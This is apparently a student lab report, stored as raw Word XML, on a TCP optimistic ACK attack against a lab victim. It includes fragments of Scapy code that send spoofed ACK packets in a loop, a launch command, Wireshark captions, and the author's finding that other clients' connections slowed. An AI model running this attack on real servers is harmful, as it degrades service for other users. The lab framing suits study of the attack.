    <w:p w14:paraId="1C0F09CB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start_ack = lastdata.seq  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F7742F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print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(start_ack)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B30F4D5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window = len(lastdata.payload.payload)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602D6D56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print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(window)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C873E7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1341D5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3FD144D9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i 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in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range(1, int(10000000 / window)):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4B02B6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</w:t>
      </w:r>
      <w:r w:rsidR="009A69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opt_ack_attack =  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IP(dst=host) / TCP(sport=source_port, dport=dest_port, flags=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'A'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, ack=(start_ack + i * window), seq=(sequence_no + 1))  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB3DDB5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="004258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 xml:space="preserve">    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if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i==1:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314D1736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="004258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ab/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00A300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print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A300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/>
        </w:rPr>
        <w:t>"first data"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75803DC4" w14:textId="77777777" w:rsidR="00A3009D" w:rsidRPr="00A3009D" w:rsidRDefault="00A3009D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="004258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ab/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r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opt_ack_attack.show()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE8F86" w14:textId="77777777" w:rsidR="00A3009D" w:rsidRPr="00A3009D" w:rsidRDefault="009A69FC" w:rsidP="00A3009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="00A3009D" w:rsidRPr="00A300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send(opt_ack_attack)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3664E351" w14:textId="77777777" w:rsidR="00777F86" w:rsidRDefault="00777F86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577179E2" w14:textId="77777777" w:rsidR="00410FB9" w:rsidRDefault="00410FB9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3EBDACB9" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRDefault="00AB7B3C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1CEDB7E3" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRDefault="00AB7B3C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375DBCAD" w14:textId="0D980B14" w:rsidR="009A69FC" w:rsidRDefault="009A69FC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>Launch Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D6783A" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRDefault="00A3009D" w:rsidP="00AB7B3C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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C1011" w14:textId="672AD912" w:rsidR="00A3009D" w:rsidRPr="00AC2B37" w:rsidRDefault="00A3009D" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Run in the attacker machine ./OptimisticAckAttacker.py –host  “1</w:t>
      </w:r>
      <w:r w:rsidR="00410FB9" w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>72.20.57.57</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A12023" w14:textId="77777777" w:rsidR="00B54D77" w:rsidRDefault="00B54D77" w:rsidP="00410FB9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255AAEE4" w14:textId="77777777" w:rsidR="00410FB9" w:rsidRDefault="00410FB9" w:rsidP="00410FB9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>Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F421F1" w14:textId="77777777" w:rsidR="00410FB9" w:rsidRPr="00410FB9" w:rsidRDefault="00410FB9" w:rsidP="00410FB9">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC6EE79" w14:textId="77777777" w:rsidR="00410FB9" w:rsidRPr="00410FB9" w:rsidRDefault="00410FB9" w:rsidP="00410FB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00410FB9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Running the attack code and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r w:rsidRPr="00410FB9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>handshake of the three</w:t>
      </w:r>
      <w:r w:rsidRPr="00410FB9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> handshakes of TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> between attacker and victim</w:t>
      </w:r>
      <w:r w:rsidRPr="00410FB9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6094C0" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRDefault="00AB7B3C" w:rsidP="00410FB9">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB75C38" w14:textId="6946544D" w:rsidR="00410FB9" w:rsidRPr="00410FB9" w:rsidRDefault="00E1714D" w:rsidP="00410FB9">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:noProof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w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="008C3347">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="328E9947" wp14:editId="7879873E">
            <wp:extent cx="40290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hang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65" cy="41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9606" w14:textId="77777777" w:rsidR="008B46F6" w:rsidRDefault="008B46F6" w:rsidP="008B46F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293AA646" w14:textId="73F4CFBD" w:rsidR="00AB7B3C" w:rsidRPr="00AB7B3C" w:rsidRDefault="00AB7B3C" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73DCA79A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47A7C978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23135A5C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5DB16A04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11BD3759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7C752496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4BCDC7BD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7D0B32D6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68C23C24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15639669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696E6C96" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRDefault="00AB7B3C" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="333CD31D" w14:textId="652AEFD6" w:rsidR="00AB7B3C" w:rsidRDefault="00AB7B3C" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7B3C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Second handshake of victim syn-ack reply:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3FC015" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRPr="00AB7B3C" w:rsidRDefault="00AB7B3C" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF39A44" w14:textId="665AAF68" w:rsidR="00410FB9" w:rsidRPr="00AB7B3C" w:rsidRDefault="008C3347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  <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F7A468E" wp14:editId="1E390150">
            <wp:extent cx="3857625" cy="4248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han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37" cy="43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DFD9" w14:textId="36F068BD" w:rsidR="00410FB9" w:rsidRDefault="00410FB9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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA543B2" w14:textId="77777777" w:rsidR="00410FB9" w:rsidRDefault="00410FB9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55C57618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0D2938DD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5402AA14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105F9864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69BF15DF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21CCDDA1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2030E47E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22A653EE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18B6429C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0704ED74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65045533" w14:textId="466D1E3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312308E3" w14:textId="0C191580" w:rsidR="00410FB9" w:rsidRDefault="00410FB9" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7B3C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Third  handshake or ack from attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395A7796" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRPr="00AB7B3C" w:rsidRDefault="00AB7B3C" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2818C4CF" w14:textId="0B9660B7" w:rsidR="00410FB9" w:rsidRPr="00410FB9" w:rsidRDefault="008C3347" w:rsidP="00410FB9">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2309165D" wp14:editId="2AB60BD7">
            <wp:extent cx="4124325" cy="449455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han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76" cy="45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298" w14:textId="77777777" w:rsidR="008B46F6" w:rsidRPr="008B46F6" w:rsidRDefault="008B46F6" w:rsidP="008B46F6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727965AD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171A9A53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5B91F8B8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2E12D6E6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3D124A48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1EEDD9D4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5F72E7C5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66C136E2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0C906EEB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276F67B5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71F77CDE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0E0A974B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7861904D" w14:textId="3C5B1EC2" w:rsidR="00410FB9" w:rsidRDefault="00410FB9" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7B3C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Reply packet against the ack from attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB7C821" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRPr="00AB7B3C" w:rsidRDefault="00AB7B3C" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E9C711" w14:textId="1535FE78" w:rsidR="00410FB9" w:rsidRPr="00410FB9" w:rsidRDefault="008C3347" w:rsidP="00410FB9">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/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36FEC27" wp14:editId="53995A94">
            <wp:extent cx="4076700" cy="4592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han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690" cy="46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C300" w14:textId="77777777" w:rsidR="00410FB9" w:rsidRDefault="00410FB9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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF39917" w14:textId="77777777" w:rsidR="00410FB9" w:rsidRDefault="008B46F6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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4844C2C6" w14:textId="77777777" w:rsidR="008B46F6" w:rsidRDefault="008B46F6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10F10158" w14:textId="77777777" w:rsidR="008B46F6" w:rsidRDefault="008B46F6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</w:p>
    <w:p w14:paraId="08CD5787" w14:textId="77777777" w:rsidR="008B46F6" w:rsidRDefault="008B46F6" w:rsidP="00777F86">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A178F83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45558544" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRDefault="00AB7B3C" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A37F41" w14:textId="53611427" w:rsidR="00785D5C" w:rsidRPr="007E28EA" w:rsidRDefault="008B46F6" w:rsidP="007E28EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7B3C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>TCP handshaking in wireshark of attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4355B6B5" w14:textId="77777777" w:rsidR="008B46F6" w:rsidRDefault="008B46F6" w:rsidP="00785D5C">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05341767" wp14:editId="3A727295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0C47" w14:textId="77777777" w:rsidR="00785D5C" w:rsidRDefault="00785D5C" w:rsidP="00777F86">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="040CC7E7" w14:textId="51ED5D44" w:rsidR="00AB7B3C" w:rsidRPr="007E28EA" w:rsidRDefault="00785D5C" w:rsidP="007E28EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00785D5C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Optimistic TCP ack send by attacker in wireshark:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1938D5BB" w14:textId="77777777" w:rsidR="003C203B" w:rsidRDefault="003C203B" w:rsidP="003C203B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/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3A27F64" wp14:editId="1BFE0130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7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2F4" w14:textId="77777777" w:rsidR="009A69FC" w:rsidRDefault="009A69FC" w:rsidP="003C203B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68B6108D" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRDefault="00AB7B3C" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64991CF5" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRDefault="00AB7B3C" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16DB6367" w14:textId="6FB69461" w:rsidR="00AB7B3C" w:rsidRPr="007E28EA" w:rsidRDefault="009A69FC" w:rsidP="007E28EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7B3C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ack received shown from the victim side using wireshark:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE6F5DA" w14:textId="77777777" w:rsidR="009A69FC" w:rsidRPr="009A69FC" w:rsidRDefault="009A69FC" w:rsidP="009A69FC">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A804A74" wp14:editId="0EB46C5B">
            <wp:extent cx="5924550" cy="315722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40" cy="31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7EC3" w14:textId="77777777" w:rsidR="00B54D77" w:rsidRDefault="00B54D77" w:rsidP="00785D5C">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22BD4F9F" w14:textId="6B4EC7C2" w:rsidR="00B54D77" w:rsidRDefault="009A69FC" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see tcp acks from both the attacker side and the </w:t>
      </w:r>
      <w:r w:rsidR="00B54D77">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> side on wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48525835" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRPr="00AB7B3C" w:rsidRDefault="00AB7B3C" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A45DFA" w14:textId="77777777" w:rsidR="00F54725" w:rsidRDefault="003C203B" w:rsidP="00F547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Was my attack successful?</w:t>
      </w:r>
      <w:r w:rsidR="00F54725">
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F54725">
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F54725">
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F54725">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B62A24" w14:textId="77777777" w:rsidR="003C203B" w:rsidRPr="00AC2B37" w:rsidRDefault="003C203B" w:rsidP="003C203B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Yes, my attack was successful to some extent. I was able to send unnecessary acks which had nothing to do with the connection and get reply packets from the victim for that ack which </w:t>
      </w:r>
      <w:r w:rsidR="00B54D77" w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>a successful manipulation of TCP optimal ack property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310C15BC" w14:textId="77777777" w:rsidR="008C3347" w:rsidRPr="00AC2B37" w:rsidRDefault="003C203B" w:rsidP="008C3347">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>I had visible effect on the server by this ack packets as it slowed down the connection with other clients</w:t>
      </w:r>
      <w:r w:rsidR="00B54D77" w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7B9D9D" w14:textId="3AAD9A7A" w:rsidR="000B7FBE" w:rsidRPr="00425884" w:rsidRDefault="003C203B" w:rsidP="008C3347">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10233724" wp14:editId="32070C49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ndowspingbefo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03B">
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Fig: Ping to “google.com” at normal condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475A7783" w14:textId="77777777" w:rsidR="00425884" w:rsidRDefault="00425884" w:rsidP="000B7FBE">
      <w:pPr>
